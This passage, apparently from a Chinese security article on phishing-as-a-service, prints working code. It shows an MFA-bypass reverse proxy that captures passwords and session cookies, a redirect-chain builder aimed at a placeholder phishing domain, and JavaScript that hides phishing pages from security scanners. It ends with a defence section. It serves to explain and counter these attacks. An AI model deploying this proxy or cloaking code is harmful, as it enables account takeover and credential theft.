&#061; self.target_domain<\/p>\n<p># \u8f6c\u53d1\u8bf7\u6c42<\/p>\n<p>resp &#061; self.session.request(<\/p>\n<p>method&#061;req.method,<\/p>\n<p>url&#061;url,<\/p>\n<p>headers&#061;headers,<\/p>\n<p>data&#061;req.get_data(),<\/p>\n<p>cookies&#061;req.cookies,<\/p>\n<p>allow_redirects&#061;False<\/p>\n<p>)<\/p>\n<p>return resp<\/p>\n<p>def capture_credentials(self, req):<\/p>\n<p>&#034;&#034;&#034;\u4ece\u8bf7\u6c42\u4e2d\u63d0\u53d6\u51ed\u636e&#034;&#034;&#034;<\/p>\n<p>if req.method &#061;&#061; &#039;POST&#039;:<\/p>\n<p>form_data &#061; req.form<\/p>\n<p>if &#039;username&#039; in form_data or &#039;passwd&#039; in form_data:<\/p>\n<p>self.captured_credentials.append({<\/p>\n<p>&#039;username&#039;: form_data.get(&#039;username&#039;, &#039;&#039;),<\/p>\n<p>&#039;password&#039;: form_data.get(&#039;passwd&#039;, &#039;&#039;),<\/p>\n<p>&#039;timestamp&#039;: req.environ.get(&#039;HTTP_X_FORWARDED_FOR&#039;, req.remote_addr)<\/p>\n<p>})<\/p>\n<p>def capture_session_cookie(self, resp):<\/p>\n<p>&#034;&#034;&#034;\u6355\u83b7\u8ba4\u8bc1\u540e\u7684\u4f1a\u8bddCookie&#034;&#034;&#034;<\/p>\n<p>for cookie in resp.cookies:<\/p>\n<p>if cookie.name in [&#039;ESTSAUTH&#039;, &#039;SSO_SESSION&#039;, &#039;auth_token&#039;]:<\/p>\n<p>self.captured_cookies[cookie.name] &#061; cookie.value<\/p>\n<p>def rewrite_response(self, resp, original_req):<\/p>\n<p>&#034;&#034;&#034;\u91cd\u5199\u54cd\u5e94\u5185\u5bb9&#xff0c;\u5c06\u771f\u5b9e\u57df\u540d\u66ff\u6362\u4e3a\u9493\u9c7c\u57df\u540d&#034;&#034;&#034;<\/p>\n<p>content &#061; resp.text<\/p>\n<p># \u66ff\u6362\u6240\u6709\u771f\u5b9e\u57df\u540d\u5f15\u7528\u4e3a\u9493\u9c7c\u57df\u540d<\/p>\n<p>content &#061; content.replace(self.target_domain, request.host)<\/p>\n<p>content &#061; content.replace(f&#039;{TARGET_SCHEME}:\/\/{self.target_domain}&#039;, request.url_root.rstrip(&#039;\/&#039;))<\/p>\n<p># \u91cd\u5199\u8868\u5355action\u5c5e\u6027<\/p>\n<p>content &#061; re.sub(<\/p>\n<p>r&#039;action&#061;[&#034;\\\\&#039;]([^&#034;\\\\&#039;]*)[&#034;\\\\&#039;]&#039;,<\/p>\n<p>lambda m: f&#039;action&#061;&#034;{self.rewrite_url(m.group(1))}&#034;&#039;,<\/p>\n<p>content<\/p>\n<p>)<\/p>\n<p># \u91cd\u5199JavaScript\u4e2d\u7684URL\u5f15\u7528<\/p>\n<p>content &#061; re.sub(<\/p>\n<p>r&#039;[&#034;\\\\&#039;]https?:\/\/[^&#034;\\\\&#039;]*&#039; &#043; re.escape(self.target_domain) &#043; r&#039;[^&#034;\\\\&#039;]*[&#034;\\\\&#039;]&#039;,<\/p>\n<p>lambda m: m.group(0).replace(self.target_domain, request.host),<\/p>\n<p>content<\/p>\n<p>)<\/p>\n<p>response &#061; make_response(content)<\/p>\n<p>response.headers &#061; dict(resp.headers)<\/p>\n<p>response.headers[&#039;Content-Encoding&#039;] &#061; &#039;identity&#039;<\/p>\n<p># \u8bbe\u7f6e\u6355\u83b7\u7684Cookie<\/p>\n<p>for name, value in self.captured_cookies.items():<\/p>\n<p>response.set_cookie(name, value, domain&#061;request.host, httponly&#061;False, secure&#061;False)<\/p>\n<p>return response<\/p>\n<p>def rewrite_url(self, url):<\/p>\n<p>&#034;&#034;&#034;\u5c06\u771f\u5b9eURL\u91cd\u5199\u4e3a\u9493\u9c7cURL&#034;&#034;&#034;<\/p>\n<p>if url.startswith(&#039;http&#039;):<\/p>\n<p>return url.replace(self.target_domain, request.host)<\/p>\n<p>return urljoin(request.url_root, url)<\/p>\n<p>proxy &#061; MFABypassProxy(TARGET_DOMAIN)<\/p>\n<p>&#064;app.route(&#039;\/&lt;path:path&gt;&#039;, methods&#061;[&#039;GET&#039;, &#039;POST&#039;, &#039;PUT&#039;, &#039;DELETE&#039;])<\/p>\n<p>def proxy_handler(path):<\/p>\n<p># \u6355\u83b7\u51ed\u636e<\/p>\n<p>proxy.capture_credentials(request)<\/p>\n<p># \u8f6c\u53d1\u8bf7\u6c42\u5230\u771f\u5b9e\u670d\u52a1\u5668<\/p>\n<p>target_response &#061; proxy.forward_request(request)<\/p>\n<p># \u6355\u83b7\u4f1a\u8bddCookie<\/p>\n<p>proxy.capture_session_cookie(target_response)<\/p>\n<p># \u91cd\u5199\u54cd\u5e94\u5185\u5bb9<\/p>\n<p>return proxy.rewrite_response(target_response, request)<\/p>\n<p>if __name__ &#061;&#061; &#039;__main__&#039;:<\/p>\n<p>app.run(host&#061;&#039;0.0.0.0&#039;, port&#061;443, ssl_context&#061;&#039;adhoc&#039;)<\/p>\n<p>\u4e0a\u8ff0\u4ee3\u7801\u63ed\u793a\u4e86MFA\u7ed5\u8fc7\u4ee3\u7406\u7684\u6838\u5fc3\u5de5\u4f5c\u673a\u5236\u3002\u653b\u51fb\u8005\u670d\u52a1\u5668\u4f5c\u4e3a\u4e2d\u95f4\u4eba&#xff0c;\u5b8c\u6574\u4ee3\u7406\u7528\u6237\u4e0e\u771f\u5b9e\u8ba4\u8bc1\u670d\u52a1\u4e4b\u95f4\u7684\u6240\u6709\u901a\u4fe1\u3002\u7528\u6237\u8ba4\u4e3a\u81ea\u5df1\u6b63\u5728\u4e0e\u771f\u5b9e\u670d\u52a1\u4ea4\u4e92&#xff0c;\u4f46\u5b9e\u9645\u4e0a\u6240\u6709\u8f93\u5165\u5747\u88ab\u653b\u51fb\u8005\u8bb0\u5f55\u3002\u5f53\u7528\u6237\u5b8c\u6210MFA\u9a8c\u8bc1\u540e&#xff0c;\u653b\u51fb\u8005\u83b7\u53d6\u6709\u6548\u7684\u4f1a\u8bddCookie&#xff0c;\u53ef\u76f4\u63a5\u7528\u4e8e\u8bbf\u95ee\u76ee\u6807\u8d26\u6237&#xff0c;\u65e0\u9700\u518d\u6b21\u8fdb\u884c\u8ba4\u8bc1\u3002<\/p>\n<p>3.2 \u4f1a\u8bdd\u4ee4\u724c\u7a83\u53d6\u4e0e\u6301\u4e45\u5316<\/p>\n<p>\u83b7\u53d6\u4f1a\u8bddCookie\u540e&#xff0c;\u653b\u51fb\u8005\u9762\u4e34\u7684\u5173\u952e\u95ee\u9898\u662f\u5982\u4f55\u7ef4\u6301\u8bbf\u95ee\u6743\u9650\u3002\u73b0\u4ee3\u8ba4\u8bc1\u7cfb\u7edf\u901a\u5e38\u5b9e\u65bd\u4f1a\u8bdd\u8d85\u65f6\u3001IP\u7ed1\u5b9a\u3001\u8bbe\u5907\u6307\u7eb9\u7b49\u5b89\u5168\u63a7\u5236&#xff0c;\u653b\u51fb\u8005\u9700\u91c7\u53d6\u76f8\u5e94\u89c4\u907f\u63aa\u65bd&#xff1a;<\/p>\n<p>\u4f1a\u8bdd\u4ee4\u724c\u4e2d\u7ee7\u670d\u52a1&#xff1a;\u90e8\u5206PhaaS\u5e73\u53f0\u63d0\u4f9b\u6301\u7eed\u7684\u4ee4\u724c\u4e2d\u7ee7\u529f\u80fd&#xff0c;\u653b\u51fb\u8005\u65e0\u9700\u76f4\u63a5\u6301\u6709Cookie&#xff0c;\u800c\u662f\u901a\u8fc7\u4ee3\u7406\u670d\u52a1\u5668\u6301\u7eed\u8f6c\u53d1\u8ba4\u8bc1\u8bf7\u6c42\u3002\u8fd9\u79cd\u65b9\u5f0f\u53ef\u89c4\u907f\u57fa\u4e8eIP\u6216\u8bbe\u5907\u6307\u7eb9\u7684\u5f02\u5e38\u68c0\u6d4b\u3002<\/p>\n<p>Cookie\u52a0\u5bc6\u4e0e\u5bfc\u51fa&#xff1a;\u653b\u51fb\u8005\u5c06\u6355\u83b7\u7684Cookie\u52a0\u5bc6\u5b58\u50a8&#xff0c;\u5e76\u5bfc\u51fa\u81f3\u6d4f\u89c8\u5668\u914d\u7f6e\u6587\u4ef6\u6216\u4e13\u7528\u5de5\u5177&#xff08;\u5982ModHeader\u3001Cookie Editor&#xff09;&#xff0c;\u5728\u9700\u8981\u65f6\u6ce8\u5165\u5230\u6d4f\u89c8\u5668\u4f1a\u8bdd\u4e2d\u3002<\/p>\n<p>\u591a\u5730\u70b9\u5e76\u53d1\u8bbf\u95ee&#xff1a;\u4e3a\u907f\u514d\u89e6\u53d1\u5f02\u5e38\u767b\u5f55\u68c0\u6d4b&#xff0c;\u653b\u51fb\u8005\u63a7\u5236\u8bbf\u95ee\u9891\u7387\u548c\u5730\u7406\u4f4d\u7f6e&#xff0c;\u6a21\u62df\u6b63\u5e38\u7528\u6237\u884c\u4e3a\u6a21\u5f0f\u3002<\/p>\n<p>3.3 MFA\u7ed5\u8fc7\u7684\u6280\u672f\u5c40\u9650\u4e0e\u5bf9\u6297<\/p>\n<p>\u5c3d\u7ba1MFA\u7ed5\u8fc7\u6280\u672f\u65e5\u76ca\u6210\u719f&#xff0c;\u4f46\u4ecd\u5b58\u5728\u4e00\u5b9a\u5c40\u9650\u6027\u3002\u57fa\u4e8eFIDO2\/WebAuthn\u7684\u786c\u4ef6\u5bc6\u94a5\u8ba4\u8bc1&#xff08;\u5982YubiKey&#xff09;\u901a\u8fc7\u975e\u5bf9\u79f0\u52a0\u5bc6\u548c\u57df\u540d\u7ed1\u5b9a\u673a\u5236&#xff0c;\u53ef\u6709\u6548\u62b5\u5fa1\u4e2d\u95f4\u4eba\u653b\u51fb\u3002\u5f53\u7528\u6237\u5c1d\u8bd5\u5728\u9493\u9c7c\u7f51\u7ad9\u4f7f\u7528\u786c\u4ef6\u5bc6\u94a5\u8ba4\u8bc1\u65f6&#xff0c;\u6d4f\u89c8\u5668\u4f1a\u9a8c\u8bc1\u57df\u540d\u4e0e\u8bc1\u4e66\u7684\u4e00\u81f4\u6027&#xff0c;\u53d1\u73b0\u4e0d\u5339\u914d\u540e\u62d2\u7edd\u8ba4\u8bc1\u8bf7\u6c42\u3002\u6b64\u5916&#xff0c;\u90e8\u5206\u4f01\u4e1a\u5b9e\u65bd\u7684\u6761\u4ef6\u8bbf\u95ee\u7b56\u7565&#xff08;\u5982\u8981\u6c42\u7279\u5b9a\u8bbe\u5907\u3001\u7f51\u7edc\u4f4d\u7f6e\u3001\u5408\u89c4\u72b6\u6001&#xff09;\u4e5f\u53ef\u589e\u52a0\u653b\u51fb\u8005\u5229\u7528\u88ab\u76d7\u4f1a\u8bdd\u7684\u96be\u5ea6\u3002<\/p>\n<p>4 URL\u6df7\u6dc6\u6280\u672f\u4e0e\u68c0\u6d4b\u89c4\u907f\u5206\u6790<\/p>\n<p>URL\u6df7\u6dc6\u662fPhaaS\u653b\u51fb\u4e2d\u53e6\u4e00\u9879\u5173\u952e\u6280\u672f&#xff0c;\u5176\u76ee\u7684\u662f\u7ed5\u8fc7\u57fa\u4e8e\u57df\u540d\u58f0\u8a89\u548cURL\u7279\u5f81\u7684\u5b89\u5168\u68c0\u6d4b\u7cfb\u7edf\u30022025\u5e74Barracuda\u62a5\u544a\u663e\u793a&#xff0c;48%\u7684\u9493\u9c7c\u653b\u51fb\u91c7\u7528URL\u6df7\u6dc6\u6280\u672f&#xff0c;\u624b\u6cd5\u591a\u6837\u4e14\u6301\u7eed\u6f14\u8fdb\u3002<\/p>\n<p>4.1 \u591a\u91cd\u8df3\u8f6c\u94fe\u6280\u672f<\/p>\n<p>\u653b\u51fb\u8005\u901a\u8fc7\u6784\u5efa\u591a\u5c42\u8df3\u8f6c\u94fe&#xff0c;\u5c06\u6700\u7ec8\u9493\u9c7c\u57df\u540d\u9690\u85cf\u5728\u591a\u4e2a\u4e2d\u95f4\u8df3\u8f6c\u4e4b\u540e\u3002\u5b89\u5168\u7f51\u5173\u5728\u626b\u63cfURL\u65f6&#xff0c;\u53ef\u80fd\u4ec5\u68c0\u6d4b\u7b2c\u4e00\u8df3\u57df\u540d&#xff08;\u901a\u5e38\u662f\u5408\u6cd5\u6216\u88ab\u653b\u9677\u7684\u7f51\u7ad9&#xff09;&#xff0c;\u800c\u5ffd\u7565\u540e\u7eed\u8df3\u8f6c\u76ee\u6807\u3002\u4ee5\u4e0b\u793a\u4f8b\u5c55\u793a\u4e86\u5178\u578b\u7684\u591a\u91cd\u8df3\u8f6c\u94fe\u5b9e\u73b0&#xff1a;<\/p>\n<p># \u591a\u91cd\u8df3\u8f6c\u94fe\u751f\u6210\u5668<\/p>\n<p>import requests<\/p>\n<p>from urllib.parse import urlencode<\/p>\n<p>class RedirectChain:<\/p>\n<p>def __init__(self):<\/p>\n<p>self.chain &#061; []<\/p>\n<p>def add_redirect(self, url, redirect_type&#061;&#039;302&#039;):<\/p>\n<p>&#034;&#034;&#034;\u6dfb\u52a0\u8df3\u8f6c\u8282\u70b9&#034;&#034;&#034;<\/p>\n<p>self.chain.append({<\/p>\n<p>&#039;url&#039;: url,<\/p>\n<p>&#039;type&#039;: redirect_type<\/p>\n<p>})<\/p>\n<p>def generate_chain(self, final_destination):<\/p>\n<p>&#034;&#034;&#034;\u751f\u6210\u5b8c\u6574\u8df3\u8f6c\u94fe&#034;&#034;&#034;<\/p>\n<p># \u6700\u7ec8\u76ee\u6807<\/p>\n<p>current_url &#061; final_destination<\/p>\n<p># \u53cd\u5411\u6784\u5efa\u8df3\u8f6c\u94fe<\/p>\n<p>for i, node in enumerate(reversed(self.chain)):<\/p>\n<p>if node[&#039;type&#039;] &#061;&#061; &#039;302&#039;:<\/p>\n<p># HTTP 302\u8df3\u8f6c<\/p>\n<p>redirect_url &#061; f&#034;{node[&#039;url&#039;]}?next&#061;{urlencode({&#039;target&#039;: current_url})}&#034;<\/p>\n<p>elif node[&#039;type&#039;] &#061;&#061; &#039;meta&#039;:<\/p>\n<p># HTML Meta\u5237\u65b0<\/p>\n<p>redirect_url &#061; f&#034;{node[&#039;url&#039;]}?redirect&#061;{current_url}&#034;<\/p>\n<p>elif node[&#039;type&#039;] &#061;&#061; &#039;js&#039;:<\/p>\n<p># JavaScript\u8df3\u8f6c<\/p>\n<p>redirect_url &#061; f&#034;{node[&#039;url&#039;]}?goto&#061;{current_url}&#034;<\/p>\n<p>current_url &#061; redirect_url<\/p>\n<p>return current_url<\/p>\n<p>def execute_chain(self, start_url):<\/p>\n<p>&#034;&#034;&#034;\u6267\u884c\u8df3\u8f6c\u94fe\u5e76\u8fd4\u56de\u6700\u7ec8\u76ee\u6807&#034;&#034;&#034;<\/p>\n<p>current_url &#061; start_url<\/p>\n<p>visited &#061; set()<\/p>\n<p>for _ in range(10): # \u9650\u5236\u6700\u5927\u8df3\u8f6c\u6b21\u6570<\/p>\n<p>if current_url in visited:<\/p>\n<p>break<\/p>\n<p>visited.add(current_url)<\/p>\n<p>try:<\/p>\n<p>resp &#061; requests.get(current_url, allow_redirects&#061;False)<\/p>\n<p>if resp.status_code in [301, 302, 303, 307, 308]:<\/p>\n<p>current_url &#061; resp.headers.get(&#039;Location&#039;, current_url)<\/p>\n<p>else:<\/p>\n<p>break<\/p>\n<p>except Exception:<\/p>\n<p>break<\/p>\n<p>return current_url<\/p>\n<p># \u4f7f\u7528\u793a\u4f8b<\/p>\n<p>chain &#061; RedirectChain()<\/p>\n<p>chain.add_redirect(&#039;https:\/\/legitimate-news-site.com\/article&#039;, &#039;302&#039;)<\/p>\n<p>chain.add_redirect(&#039;https:\/\/shortened-url.service\/abc123&#039;, &#039;302&#039;)<\/p>\n<p>chain.add_redirect(&#039;https:\/\/compromised-wordpress-site.net\/redirect.php&#039;, &#039;meta&#039;)<\/p>\n<p>final_url &#061; chain.generate_chain(&#039;https:\/\/phishing-domain.evil\/login&#039;)<\/p>\n<p>print(f&#039;Initial URL: {final_url}&#039;)<\/p>\n<p>\u4e0a\u8ff0\u4ee3\u7801\u5c55\u793a\u4e86\u653b\u51fb\u8005\u5982\u4f55\u6784\u5efa\u5305\u542b\u591a\u4e2a\u4e2d\u95f4\u8282\u70b9\u7684\u8df3\u8f6c\u94fe\u3002\u521d\u59cbURL\u6307\u5411\u770b\u4f3c\u5408\u6cd5\u7684\u65b0\u95fb\u7f51\u7ad9\u6216\u77ed\u94fe\u670d\u52a1&#xff0c;\u7ecf\u8fc7\u591a\u6b21\u8df3\u8f6c\u540e\u6700\u7ec8\u5230\u8fbe\u9493\u9c7c\u9875\u9762\u3002\u8fd9\u79cd\u6280\u672f\u4f7f\u5f97\u5b89\u5168\u7f51\u5173\u96be\u4ee5\u5728\u90ae\u4ef6\u626b\u63cf\u9636\u6bb5\u8bc6\u522b\u6700\u7ec8\u76ee\u6807\u3002<\/p>\n<p>4.2 \u53ef\u4fe1\u57df\u540d\u8def\u5f84\u5d4c\u5165<\/p>\n<p>\u53e6\u4e00\u79cd\u5e38\u89c1\u624b\u6cd5\u662f\u5c06\u9493\u9c7c\u9875\u9762\u6258\u7ba1\u5728\u53ef\u4fe1\u57df\u540d\u7684\u5b50\u8def\u5f84\u4e0b\u3002\u653b\u51fb\u8005\u901a\u8fc7\u653b\u9677WordPress\u3001SharePoint\u7b49\u7f51\u7ad9&#xff0c;\u6216\u5229\u7528Google Sites\u3001Microsoft Azure Static Web Apps\u7b49\u5408\u6cd5\u670d\u52a1&#xff0c;\u5c06\u9493\u9c7c\u5185\u5bb9\u5d4c\u5165\u53ef\u4fe1\u57df\u540d\u4e4b\u4e0b\u3002\u7531\u4e8e\u57df\u540d\u672c\u8eab\u5177\u6709\u826f\u597d\u58f0\u8a89&#xff0c;\u57fa\u4e8e\u57df\u540d\u9ed1\u540d\u5355\u7684\u68c0\u6d4b\u7cfb\u7edf\u96be\u4ee5\u8bc6\u522b\u3002<\/p>\n<p>4.3 \u4e8c\u7ef4\u7801\u9493\u9c7c&#xff08;Quishing&#xff09;<\/p>\n<p>\u7ea620%\u7684PhaaS\u653b\u51fb\u91c7\u7528\u6076\u610f\u4e8c\u7ef4\u7801\u4f5c\u4e3a\u6295\u9012\u6e20\u9053\u3002\u4e8c\u7ef4\u7801\u5c06URL\u7f16\u7801\u4e3a\u56fe\u50cf&#xff0c;\u7ed5\u8fc7\u90ae\u4ef6\u5b89\u5168\u7f51\u5173\u7684\u6587\u672c\u626b\u63cf\u3002\u7528\u6237\u626b\u63cf\u4e8c\u7ef4\u7801\u540e&#xff0c;\u76f4\u63a5\u5728\u79fb\u52a8\u8bbe\u5907\u4e0a\u6253\u5f00\u9493\u9c7c\u9875\u9762\u3002\u7531\u4e8e\u79fb\u52a8\u8bbe\u5907\u901a\u5e38\u7f3a\u4e4f\u4f01\u4e1a\u7ea7\u5b89\u5168\u4fdd\u62a4&#xff0c;\u4e14\u7528\u6237\u4e60\u60ef\u4e8e\u5feb\u901f\u626b\u7801\u64cd\u4f5c&#xff0c;\u6210\u529f\u7387\u8f83\u9ad8\u3002<\/p>\n<p>4.4 CAPTCHA\u53cd\u81ea\u52a8\u5316\u68c0\u6d4b<\/p>\n<p>43%\u7684PhaaS\u5de5\u5177\u96c6\u6210CAPTCHA\u673a\u5236&#xff0c;\u5176\u76ee\u7684\u5e76\u975e\u9632\u6b62\u673a\u5668\u4eba&#xff0c;\u800c\u662f\u963b\u788d\u5b89\u5168\u5382\u5546\u7684\u81ea\u52a8\u5316\u68c0\u6d4b\u7cfb\u7edf\u3002\u5f53\u5b89\u5168\u7f51\u5173\u5c1d\u8bd5\u81ea\u52a8\u8bbf\u95eeURL\u8fdb\u884c\u5206\u6790\u65f6&#xff0c;CAPTCHA\u4f1a\u963b\u6b62\u722c\u866b\u83b7\u53d6\u9875\u9762\u5185\u5bb9&#xff0c;\u5bfc\u81f4\u68c0\u6d4b\u5931\u8d25\u3002\u4ee5\u4e0b\u793a\u4f8b\u5c55\u793a\u4e86\u653b\u51fb\u8005\u5982\u4f55\u533a\u5206\u771f\u5b9e\u7528\u6237\u4e0e\u81ea\u52a8\u5316\u68c0\u6d4b\u7cfb\u7edf&#xff1a;<\/p>\n<p>\/\/ \u57fa\u4e8e\u884c\u4e3a\u5206\u6790\u7684CAPTCHA\u89e6\u53d1\u903b\u8f91<\/p>\n<p>function shouldShowCaptcha() {<\/p>\n<p>const botIndicators &#061; {<\/p>\n<p>\/\/ \u68c0\u6d4b\u65e0\u5934\u6d4f\u89c8\u5668<\/p>\n<p>headless: navigator.webdriver &#061;&#061;&#061; true,<\/p>\n<p>\/\/ \u68c0\u6d4b\u81ea\u52a8\u5316\u6d4b\u8bd5\u5de5\u5177<\/p>\n<p>automation: window.__SeleniumRunner || window.__PlaywrightRunner,<\/p>\n<p>\/\/ \u68c0\u6d4b\u8bbf\u95ee\u901f\u5ea6&#xff08;\u673a\u5668\u4eba\u901a\u5e38\u8fc7\u5feb&#xff09;<\/p>\n<p>fastAccess: performance.now() &lt; 500,<\/p>\n<p>\/\/ \u68c0\u6d4b\u9f20\u6807\u79fb\u52a8\u8f68\u8ff9&#xff08;\u673a\u5668\u4eba\u901a\u5e38\u65e0\u8f68\u8ff9\u6216\u76f4\u7ebf&#xff09;<\/p>\n<p>mousePattern: getMousePatternScore() &lt; 0.3,<\/p>\n<p>\/\/ \u68c0\u6d4b\u89e6\u6478\u4e8b\u4ef6&#xff08;\u79fb\u52a8\u8bbe\u5907\u7528\u6237\u901a\u5e38\u6709\u89e6\u6478&#xff09;<\/p>\n<p>touchSupport: &#039;ontouchstart&#039; in window<\/p>\n<p>};<\/p>\n<p>const botScore &#061; Object.values(botIndicators).filter(v &#061;&gt; v).length;<\/p>\n<p>\/\/ \u5982\u679c\u68c0\u6d4b\u5230\u591a\u4e2a\u673a\u5668\u4eba\u7279\u5f81&#xff0c;\u663e\u793aCAPTCHA<\/p>\n<p>if (botScore &gt;&#061; 2) {<\/p>\n<p>return true;<\/p>\n<p>}<\/p>\n<p>\/\/ \u6765\u81ea\u53ef\u4fe1Referer\u7684\u76f4\u63a5\u8bbf\u95ee&#xff0c;\u8df3\u8fc7CAPTCHA<\/p>\n<p>const trustedReferers &#061; [&#039;google.com&#039;, &#039;bing.com&#039;, &#039;linkedin.com&#039;];<\/p>\n<p>const referer &#061; document.referrer;<\/p>\n<p>if (trustedReferers.some(t &#061;&gt; referer.includes(t))) {<\/p>\n<p>return false;<\/p>\n<p>}<\/p>\n<p>return false;<\/p>\n<p>}<\/p>\n<p>\/\/ \u9f20\u6807\u79fb\u52a8\u8f68\u8ff9\u5206\u6790<\/p>\n<p>function getMousePatternScore() {<\/p>\n<p>let movements &#061; [];<\/p>\n<p>document.addEventListener(&#039;mousemove&#039;, function(e) {<\/p>\n<p>movements.push({ x: e.clientX, y: e.clientY, t: Date.now() });<\/p>\n<p>});<\/p>\n<p>\/\/ \u5206\u6790\u79fb\u52a8\u8f68\u8ff9\u7684\u968f\u673a\u6027&#xff08;\u4eba\u7c7b\u79fb\u52a8\u901a\u5e38\u66f4\u968f\u673a&#xff09;<\/p>\n<p>if (movements.length &lt; 5) return 0;<\/p>\n<p>let variance &#061; 0;<\/p>\n<p>for (let i &#061; 1; i &lt; movements.length; i&#043;&#043;) {<\/p>\n<p>const dx &#061; movements[i].x &#8211; movements[i-1].x;<\/p>\n<p>const dy &#061; movements[i].y &#8211; movements[i-1].y;<\/p>\n<p>variance &#043;&#061; Math.sqrt(dx*dx &#043; dy*dy);<\/p>\n<p>}<\/p>\n<p>return Math.min(1, variance \/ 1000);<\/p>\n<p>}<\/p>\n<p>\u4e0a\u8ff0\u4ee3\u7801\u5c55\u793a\u4e86\u653b\u51fb\u8005\u5982\u4f55\u901a\u8fc7\u884c\u4e3a\u5206\u6790\u533a\u5206\u771f\u5b9e\u7528\u6237\u4e0e\u81ea\u52a8\u5316\u68c0\u6d4b\u7cfb\u7edf\u3002\u5f53\u68c0\u6d4b\u5230\u591a\u4e2a\u673a\u5668\u4eba\u7279\u5f81\u65f6&#xff0c;\u9875\u9762\u663e\u793aCAPTCHA&#xff0c;\u963b\u6b62\u5b89\u5168\u7f51\u5173\u83b7\u53d6\u5b8c\u6574\u5185\u5bb9&#xff1b;\u800c\u771f\u5b9e\u7528\u6237\u5219\u53ef\u76f4\u63a5\u8bbf\u95ee\u9493\u9c7c\u9875\u9762&#xff0c;\u65e0\u611f\u77e5\u969c\u788d\u3002<\/p>\n<p>5 \u9632\u5fa1\u4f53\u7cfb\u6784\u5efa\u4e0e\u6280\u672f\u5e94\u5bf9\u7b56\u7565<\/p>\n<p>\u9762\u5bf9PhaaS\u5de5\u5177\u7684\u5feb\u901f\u6f14\u8fdb&#xff0c;\u4f20\u7edf\u9632\u62a4\u4f53\u7cfb\u5df2\u663e\u4e0d\u8db3\u3002\u5fc5\u987b\u6784\u5efa\u6db5\u76d6\u68c0\u6d4b\u3001\u54cd\u5e94\u3001\u9884\u9632\u7684\u7eb5\u6df1\u9632\u5fa1\u67b6\u6784&#xff0c;\u4ece\u591a\u4e2a\u5c42\u9762\u63d0\u5347\u6574\u4f53\u5b89\u5168\u6c34\u4f4d\u3002<\/p>\n<p>5.1 URL\u5b9e\u65f6\u5206\u6790\u4e0e\u52a8\u6001\u68c0\u6d4b<\/p>\n<p>\u4f20\u7edf\u57fa\u4e8e\u57df\u540d\u58f0\u8a89\u7684\u68c0\u6d4b\u65b9\u6cd5\u9762\u5bf9\u5feb\u901f\u8f6e\u6362\u7684\u9493\u9c7c\u57df\u540d\u6548\u679c\u6709\u9650\u3002\u5e94\u5f15\u5165URL\u5b9e\u65f6\u5206\u6790\u6280\u672f&#xff0c;\u5728\u7528\u6237\u70b9\u51fb\u94fe\u63a5\u65f6\u52a8\u6001\u8bc4\u4f30\u98ce\u9669&#xff1a;<\/p>\n<p>\u6c99\u7bb1\u52a8\u6001\u6267\u884c&#xff1a;\u5728\u9694\u79bb\u73af\u5883\u4e2d\u5b9e\u9645\u52a0\u8f7dURL&#xff0c;\u6267\u884cJavaScript\u4ee3\u7801&#xff0c;\u6355\u83b7\u52a8\u6001\u751f\u6210\u7684\u5185\u5bb9\u3002\u7ed3\u5408\u884c\u4e3a\u5206\u6790&#xff0c;\u8bc6\u522b\u51ed\u8bc1\u6536\u96c6\u8868\u5355\u3001\u4e2d\u95f4\u4eba\u4ee3\u7406\u7279\u5f81\u7b49\u6076\u610f\u884c\u4e3a\u3002<\/p>\n<p>\u9875\u9762\u76f8\u4f3c\u5ea6\u68c0\u6d4b&#xff1a;\u5229\u7528\u8ba1\u7b97\u673a\u89c6\u89c9\u548cDOM\u7ed3\u6784\u5206\u6790&#xff0c;\u68c0\u6d4b\u9875\u9762\u4e0e\u77e5\u540d\u767b\u5f55\u9875\u9762\u7684\u76f8\u4f3c\u5ea6\u3002\u5f53\u76f8\u4f3c\u5ea6\u8d85\u8fc7\u9608\u503c\u65f6&#xff0c;\u89e6\u53d1\u544a\u8b66\u6216\u963b\u65ad\u3002<\/p>\n<p>SSL\u8bc1\u4e66\u5206\u6790&#xff1a;\u68c0\u67e5\u8bc1\u4e66\u9881\u53d1\u673a\u6784\u3001\u6709\u6548\u671f\u3001\u57df\u540d\u5339\u914d\u5ea6\u7b49\u7279\u5f81\u3002PhaaS\u5de5\u5177\u5e38\u4f7f\u7528\u514d\u8d39\u8bc1\u4e66\u6216\u81ea\u7b7e\u540d\u8bc1\u4e66&#xff0c;\u53ef\u4f5c\u4e3a\u98ce\u9669\u6307\u6807\u3002<\/p>\n<p>5.2 \u4f1a\u8bdd\u884c\u4e3a\u76d1\u63a7\u4e0e\u5f02\u5e38\u68c0\u6d4b<\/p>\n<p>\u9488\u5bf9MFA\u7ed5\u8fc7\u653b\u51fb&#xff0c;\u5e94\u52a0\u5f3a\u4f1a\u8bdd\u5c42\u9762\u7684\u76d1\u63a7&#xff1a;<\/p>\n<p>\u8bbe\u5907\u6307\u7eb9\u7ed1\u5b9a&#xff1a;\u5c06(session)\u4e0e\u8bbe\u5907\u6307\u7eb9&#xff08;\u6d4f\u89c8\u5668\u7279\u5f81\u3001\u786c\u4ef6\u4fe1\u606f\u3001\u7f51\u7edc\u73af\u5883&#xff09;\u7ed1\u5b9a&#xff0c;\u5f53\u4f1a\u8bdd\u5728\u4e0d\u540c\u8bbe\u5907\u6216\u7f51\u7edc\u4f7f\u7528\u65f6\u89e6\u53d1\u4e8c\u6b21\u9a8c\u8bc1\u3002<\/p>\n<p>\u8bbf\u95ee\u884c\u4e3a\u57fa\u7ebf&#xff1a;\u5efa\u7acb\u7528\u6237\u6b63\u5e38\u8bbf\u95ee\u884c\u4e3a\u57fa\u7ebf&#xff08;\u8bbf\u95ee\u65f6\u95f4\u3001\u5730\u7406\u4f4d\u7f6e\u3001\u64cd\u4f5c\u9891\u7387&#xff09;&#xff0c;\u5f53\u68c0\u6d4b\u5230\u5f02\u5e38\u6a21\u5f0f\u65f6\u81ea\u52a8\u51bb\u7ed3\u4f1a\u8bdd\u3002<\/p>\n<p>\u4f1a\u8bdd\u4ee4\u724c\u8f6e\u6362&#xff1a;\u5b9e\u65bd\u77ed\u751f\u547d\u5468\u671f\u4f1a\u8bdd\u7b56\u7565&#xff0c;\u8981\u6c42\u5b9a\u671f\u91cd\u65b0\u8ba4\u8bc1&#xff0c;\u964d\u4f4e\u88ab\u76d7\u4ee4\u724c\u7684\u6709\u6548\u65f6\u95f4\u7a97\u53e3\u3002<\/p>\n<p>5.3 